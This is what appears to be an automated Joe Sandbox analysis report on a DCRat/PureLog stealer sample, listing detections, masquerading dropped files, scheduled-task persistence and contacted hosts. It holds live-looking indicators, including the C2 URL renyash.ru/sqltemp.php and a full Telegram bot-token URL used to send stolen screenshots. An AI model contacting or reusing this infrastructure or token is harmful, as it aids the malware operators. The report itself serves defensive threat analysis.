                                    C:\Users\user\Desktop\rfCzNWvT.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\Desktop\beESemrN.log100%AviraTR/AVI.Agent.updqb
                                    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe100%Joe Sandbox ML
                                    C:\Users\user\backgroundTaskHost.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\JRcNKQWy.log100%Joe Sandbox ML
                                    C:\Drivers\fontdrvhost.exe100%Joe Sandbox ML
                                    C:\Program Files\Internet Explorer\en-US\conhost.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\UXZdmUkL.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\lNXiOOwv.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\rWShinUN.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\rfCzNWvT.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\rFAHquBj.log100%Joe Sandbox ML
                                    C:\Drivers\fontdrvhost.exe76%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe76%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Internet Explorer\en-US\conhost.exe76%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\AppData\Local\Microsoft\Windows\History\AdbXCBUViTnoVBSsOq.exe76%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\BoUXaXGR.log4%ReversingLabs
                                    C:\Users\user\Desktop\JRcNKQWy.log9%ReversingLabs
                                    C:\Users\user\Desktop\LtQnCbUd.log4%ReversingLabs
                                    C:\Users\user\Desktop\OwXMDaSq.log25%ReversingLabs
                                    C:\Users\user\Desktop\PjHeJXVW.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\SvkCuJlg.log3%ReversingLabs
                                    C:\Users\user\Desktop\UXZdmUkL.log9%ReversingLabs
                                    C:\Users\user\Desktop\beESemrN.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\crKSmbgv.log25%ReversingLabs
                                    C:\Users\user\Desktop\lNXiOOwv.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\rFAHquBj.log8%ReversingLabs
                                    C:\Users\user\Desktop\rWShinUN.log8%ReversingLabs
                                    C:\Users\user\Desktop\rfCzNWvT.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\uNJXqjUH.log3%ReversingLabs
                                    C:\Users\user\backgroundTaskHost.exe76%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe76%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://250345cm.renyash.ru/sqltemp.php100%Avira URL Cloudmalware
                                    http://250345cm.reP2y0%Avira URL Cloudsafe
                                    http://250345cm.renyash.ru/100%Avira URL Cloudmalware
                                    http://250345cm.renyash.ruve0%Avira URL Cloudsafe
                                    http://250345cm.reP0%Avira URL Cloudsafe
                                    http://250345cm.renyash.ru100%Avira URL Cloudmalware

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    ipinfo.io
                                    		34.117.59.81
                                    		truefalse
                                      		high
                                      api.telegram.org
                                      		149.154.167.220
                                      		truefalse
                                        		high
                                        250345cm.renyash.ru
                                        		104.21.38.84
                                        		truetrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotofalse
                                            		high
                                            http://250345cm.renyash.ru/sqltemp.phptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://ipinfo.io/countryfalse
                                              		high
                                              https://ipinfo.io/ipfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://250345cm.renyash.ruAdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://duckduckgo.com/chrome_newtabVHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                    		high
                                                    https://api.telegram.orgfontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoVHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                        		high
                                                        https://api.telegram.org/botfontdrvhost.exe, 00000005.00000002.2218252211.0000000000D22000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, BoUXaXGR.log.5.dr, LtQnCbUd.log.24.drfalse
                                                          		high
                                                          http://ipinfo.iofontdrvhost.exe, 00000005.00000002.2218593117.00000000030FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://250345cm.renyash.ru/AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://250345cm.renyash.ruveAdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002BA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                                  		high
                                                                  http://250345cm.reP2yAdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br4lvmN5MENl.24.drfalse
                                                                    		high
                                                                    https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoXfontdrvhost.exe, 00000005.00000002.2218593117.0000000002DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://support.mozilla.org/products/firefoxAdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ipinfo.iofontdrvhost.exe, 00000005.00000002.2218593117.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                                            		high
                                                                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt4lvmN5MENl.24.drfalse
                                                                              		high
                                                                              http://250345cm.rePAdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchVHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                                                		high
                                                                                https://support.mozilla.org4lvmN5MENl.24.drfalse
                                                                                  		high
                                                                                  http://api.telegram.orgfontdrvhost.exe, 00000005.00000002.2218593117.0000000002E30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefontdrvhost.exe, 00000005.00000002.2218593117.0000000002987000.00000004.00000800.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=VHGrIJe2oz.24.dr, EwZcSaKyVq.24.drfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        		api.telegram.orgUnited Kingdom
                                                                                        		62041TELEGRAMRUfalse
                                                                                        104.21.38.84
                                                                                        		250345cm.renyash.ruUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        34.117.59.81
                                                                                        		ipinfo.ioUnited States
                                                                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1583030
                                                                                        Start date and time:2025-01-01 16:01:09 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 11m 4s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:44
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:eP6sjvTqJa.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:f0944c44a97161524ce95c9f8a2629f9.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@40/51@3/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 28.6%
                                                                                        HCA Information:Failed
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 172.202.163.200
                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target AdbXCBUViTnoVBSsOq.exe, PID 1016 because it is empty
                                                                                        • Execution Graph export aborted for target fontdrvhost.exe, PID 3084 because it is empty
                                                                                        • Execution Graph export aborted for target fontdrvhost.exe, PID 4328 because it is empty
                                                                                        • Execution Graph export aborted for target fontdrvhost.exe, PID 6528 because it is empty
                                                                                        • Execution Graph export aborted for target fontdrvhost.exe, PID 7192 because it is empty
                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        10:02:08API Interceptor30x Sleep call for process: fontdrvhost.exe modified
                                                                                        10:02:15API Interceptor13207490x Sleep call for process: AdbXCBUViTnoVBSsOq.exe modified
                                                                                        16:02:07Task SchedulerRun new task: AdbXCBUViTnoVBSsOq path: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                                                                        16:02:08Task SchedulerRun new task: AdbXCBUViTnoVBSsOqA path: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                                                                        16:02:08Task SchedulerRun new task: backgroundTaskHost path: "C:\Users\user\backgroundTaskHost.exe"
                                                                                        16:02:08Task SchedulerRun new task: backgroundTaskHostb path: "C:\Users\user\backgroundTaskHost.exe"
                                                                                        16:02:08Task SchedulerRun new task: conhost path: "C:\Program Files\Internet Explorer\en-US\conhost.exe"
                                                                                        16:02:08Task SchedulerRun new task: conhostc path: "C:\Program Files\Internet Explorer\en-US\conhost.exe"
                                                                                        16:02:08Task SchedulerRun new task: fontdrvhost path: "C:\Drivers\fontdrvhost.exe"
                                                                                        16:02:08Task SchedulerRun new task: fontdrvhostf path: "C:\Drivers\fontdrvhost.exe"

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                              Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                                                    Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                        Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                          i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                            104.21.38.84GqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 101349cm.renyash.ru/VideovmGamedefaultTestuniversalwp.php
                                                                                                            1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                                                                            YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 250345cm.renyash.ru/sqltemp.php
                                                                                                            U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                                                                            ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
                                                                                                            67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
                                                                                                            gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ipinfo.ioYGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 34.117.59.81
                                                                                                            Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 34.117.59.81
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                            • 34.117.59.81
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                            • 34.117.59.81
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                            • 34.117.59.81
                                                                                                            58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.59.81
                                                                                                            main1.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                            • 34.117.59.81
                                                                                                            pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.59.81
                                                                                                            YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.59.81
                                                                                                            YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.59.81
                                                                                                            250345cm.renyash.ruYGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 104.21.38.84
                                                                                                            api.telegram.orgYGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRUYGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            over.ps1Get hashmaliciousVidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CLOUDFLARENETUSGqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 172.67.220.198
                                                                                                            1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 104.21.38.84
                                                                                                            YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 104.21.38.84
                                                                                                            https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.24.14
                                                                                                            http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.13.60
                                                                                                            https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.64.1
                                                                                                            6a7e35.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.32.1
                                                                                                            http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGVJFQli_mKczqrYpzYk33dCMwBXQR8R8u2JajJsC51OFcIlRSs_l3i1d9MQf5ZYWuxV_Ytx1pTi2iUY6P97JH0U81Get hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGu732v1MZ_EelGtWldAkkdtYGfnD-GIQEN8fgQfvllyKpzr3-J0fwpuBZsUPy3J_TvPM8sfKRevcMTcDv6eAynng1Get hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.96.3
                                                                                                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGYGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 34.117.59.81
                                                                                                            https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.77.79
                                                                                                            http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.77.79
                                                                                                            https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.77.79
                                                                                                            Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 34.117.59.81
                                                                                                            botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 34.118.114.163
                                                                                                            loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 34.117.61.150
                                                                                                            arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                            • 34.67.61.212
                                                                                                            rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 34.117.188.166
                                                                                                            rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 34.117.188.166

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eYGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            1.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            OPRfEWLTto.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCKGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            over.ps1Get hashmaliciousVidarBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Drivers\fontdrvhost.exeEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                C:\Program Files\Internet Explorer\en-US\conhost.exeEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Drivers\5b884080fd4f94

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (543), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):543
                                                                                                                  Entropy (8bit):5.876513737259657
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:gI1lhokNFvEE+AA+RQjfzA7qcE0j8RQYXHCoXAHYsuWgsHM0FGB3x:gmEEjdQjf4qSMNZ+5uWg6rWx
                                                                                                                  MD5:4FADCE842D493D7F68C432C0451BA94E
